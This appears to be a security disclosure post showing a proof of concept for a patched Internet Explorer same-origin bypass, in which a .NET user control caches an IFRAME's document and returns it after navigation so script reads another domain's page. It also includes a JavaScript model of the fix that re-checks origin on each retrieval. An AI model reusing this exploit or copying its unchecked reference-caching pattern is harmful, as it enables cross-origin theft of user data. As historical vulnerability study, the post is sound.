A .NET user control hosted in IE can store a reference to an IFRAME’s document object. After the IFRAME navigates to a different domain, the stored reference remains valid and bypasses all same-origin checks — because the security check happens at the time of access, not at the time of storage, and the .NET layer doesn’t re-evaluate the origin when the stored object is returned.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>userControlCachedDocumentXDomain</title></head>
<body style="visibility:hidden;" onload="document.body.style.visibility='visible';">
<font face="Tahoma" size="2">
<center>
<h1>userControl Cached Document XDomain</h1>
</center>
1) Store (cache) a reference to the <b>iframe document</b> inside a .NET userControl.<br />
2) Change the iframe URL.<br />
3) Retrieve the document from the .NET userControl and access it with no domain restrictions.<br />
<br />
<center>
<b>Double Click inside the textArea to run the code.</b><br />
<textarea tabindex="2" id="textAreaCode" ondblclick="eval(this.value);" style="width:600px;height:90px;font-family: Tahoma, Arial, Helvetica, sans-serif; font-size:12px;">
myApplet.SetObject(xDomainIframe.document);

xDomainIframe.location = "http://www.google.com";

setTimeout('alert(myApplet.GetObject().body.innerHTML)',5000);
</textarea>
<object id="myApplet" classid="http:MyApplet.dll#AppStart" width="200" height="200"></object>
<iframe name="xDomainIframe" width="400" height="200"></iframe>
</center>
</font>
</body>
</html>

MyApplet.cs (.NET user control source):

using System;
using System.Drawing;
using System.Windows.Forms;
using mshtml;

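public class AppStart : Control
{
    // Cached COM reference to the IFRAME's document, set from script.
    public HTMLDocument myHTMLDocument;

    // Returns the cached reference as-is; no origin check is made here.
    public HTMLDocument GetObject()
    {
        return myHTMLDocument;
    }
    // Stores the document reference passed in from the hosting page's script.
    public HTMLDocument SetObject(HTMLDocument myObject)
    {
        myHTMLDocument = myObject;
        return myObject;
    }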
    protected override void OnPaint(PaintEventArgs e)
    {
        e.Graphics.FillRectangle(new SolidBrush(Color.Coral), ClientRectangle);
    }
    [STAThread]
    public static void Main(string[] m)
    {
        AppStart myAppStart = new AppStart();
        myAppStart.Dock = DockStyle.Fill;
    }
}

The .NET control stores an HTMLDocument COM pointer. When the IFRAME navigates to Google, IE’s security model would normally block access to that document from the original domain’s script — but the .NET control acts as a trusted intermediary that returns the pointer without performing an origin check. Five seconds later, GetObject().body.innerHTML reads Google’s DOM without any error.
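
The missing check described above, shown as an added example that is not part of the original post and is not IE or .NET code: a JavaScript model in which the intermediary repeats the origin comparison each time it hands the stored reference back. The classes DocHandle, Frame, NaiveBroker and CheckedBroker, the function runScenario and the site-a.example / site-b.example origins are hypothetical, and the model assumes (from the PoC's behaviour) that the stored handle survives navigation.

```javascript
// Constructed model, not IE or .NET code. Assumption taken from the PoC's
// behaviour: the stored handle survives navigation and then resolves to the
// new origin's content.
class DocHandle {
  constructor(origin, html) { this.origin = origin; this.html = html; }
}
class Frame {
  constructor(origin, html) { this.document = new DocHandle(origin, html); }
  navigate(origin, html) { // same handle, new origin and content
    this.document.origin = origin;
    this.document.html = html;
  }
}

// Broker as described on the page: returns the stored pointer unchecked.
class NaiveBroker {
  setObject(callerOrigin, doc) { this.doc = doc; return doc; }
  getObject(callerOrigin) { return this.doc; }
}

// Hardened broker: compares origins on every hand-out, using the handle's
// current origin rather than the one it had when it was stored.
class CheckedBroker {
  setObject(callerOrigin, doc) {
    if (doc.origin !== callerOrigin) throw new Error("cross-origin store denied");
    this.doc = doc;
    return doc;
  }
  getObject(callerOrigin) {
    if (!this.doc || this.doc.origin !== callerOrigin) return null;
    return this.doc;
  }
}

// Replays the page's three steps against a broker class.
function runScenario(Broker) {
  const caller = "http://site-a.example"; // constructed origins and markup
  const frame = new Frame(caller, "<p>site A</p>");
  const broker = new Broker();
  broker.setObject(caller, frame.document);            // 1) cache the reference
  const first = broker.getObject(caller);
  const sameOriginRead = first ? first.html : null;
  frame.navigate("http://site-b.example", "<p>site B private</p>"); // 2) navigate
  const second = broker.getObject(caller);             // 3) retrieve it again
  return { sameOriginRead, leaked: second ? second.html : null };
}

console.log(runScenario(NaiveBroker), runScenario(CheckedBroker));
```

A check made only in setObject would not help here, because the reference is same-origin at the moment it is stored.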

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.